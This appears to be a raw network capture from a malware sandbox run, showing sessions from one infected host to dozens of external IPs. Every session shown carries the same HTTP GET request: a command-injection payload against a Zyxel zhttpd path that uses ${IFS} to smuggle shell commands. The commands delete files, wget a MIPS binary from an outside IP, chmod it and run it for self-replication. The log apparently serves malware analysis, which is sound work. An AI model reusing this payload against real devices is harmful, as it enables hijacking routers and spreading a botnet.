                                                Jan 28, 2024 10:16:40.034296989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8182192.168.2.235382487.21.200.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034338951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8183192.168.2.2359502205.20.122.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034338951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8184192.168.2.234607045.44.96.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034375906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8185192.168.2.2359690209.170.238.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034405947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8186192.168.2.2355298120.141.36.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034440994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8187192.168.2.233918019.97.200.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034466982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8188192.168.2.234750861.207.180.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034485102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8189192.168.2.2356416110.16.67.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034502029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8190192.168.2.233548654.7.250.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034507036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8191192.168.2.2351636207.127.146.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034557104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192192.168.2.233465050.119.222.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034563065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8193192.168.2.235689293.238.88.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034579992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8194192.168.2.235803443.162.196.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034632921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8195192.168.2.233836884.184.248.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034661055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8196192.168.2.233820687.9.171.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034674883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8197192.168.2.235524853.40.103.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034678936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8198192.168.2.234098062.183.247.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034712076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8199192.168.2.2343844141.147.235.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034734011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8200192.168.2.2339712132.211.75.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034780979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8201192.168.2.235688267.245.90.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034806967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8202192.168.2.2343480179.91.85.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034842014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8203192.168.2.2356396114.62.129.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034867048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8204192.168.2.235012634.36.85.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034874916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8205192.168.2.2335740146.90.190.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034909964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8206192.168.2.2351844105.77.125.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034930944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8207192.168.2.235761898.213.101.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.034977913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8208192.168.2.2349088170.200.156.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035013914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8209192.168.2.2334564132.63.93.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035043001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8210192.168.2.234610042.198.143.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035052061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8211192.168.2.2340566192.20.26.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035080910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8212192.168.2.233883477.173.112.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035089970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8213192.168.2.2351082176.90.213.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035123110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8214192.168.2.2349390179.123.106.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035156012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8215192.168.2.233479871.48.81.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035168886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8216192.168.2.2337232220.66.199.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035209894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8217192.168.2.23416142.50.240.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035226107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8218192.168.2.2338462166.11.159.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035264015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8219192.168.2.2335926190.33.215.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035280943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8220192.168.2.2347574120.132.164.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035316944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8221192.168.2.2351852113.99.16.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035347939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8222192.168.2.2360034197.167.237.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035387039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8223192.168.2.234127698.143.219.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035398006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8224192.168.2.235745631.243.87.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035422087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8225192.168.2.2352640139.31.14.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035437107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8226192.168.2.2353390188.13.116.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035473108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8227192.168.2.235335481.191.52.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035511017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8228192.168.2.235385096.207.193.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035542965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8229192.168.2.2355202213.24.92.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035557985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8230192.168.2.2356470223.129.162.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035598993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8231192.168.2.234562496.137.45.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035617113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8232192.168.2.2359776126.138.206.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035623074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8233192.168.2.234122052.98.200.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035655022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8234192.168.2.2346620183.18.226.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035662889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8235192.168.2.235745041.94.67.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035670042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8236192.168.2.2341722123.166.75.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035708904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8237192.168.2.235379094.173.23.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035732031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8238192.168.2.2349828139.141.121.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035732031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8239192.168.2.233545663.60.27.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035798073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8240192.168.2.233449241.10.3.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035804987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8241192.168.2.234614023.166.0.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035885096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8242192.168.2.2342206209.101.235.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.035902023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8243192.168.2.233691237.16.157.102443
                                                TimestampBytes transferredDirectionData
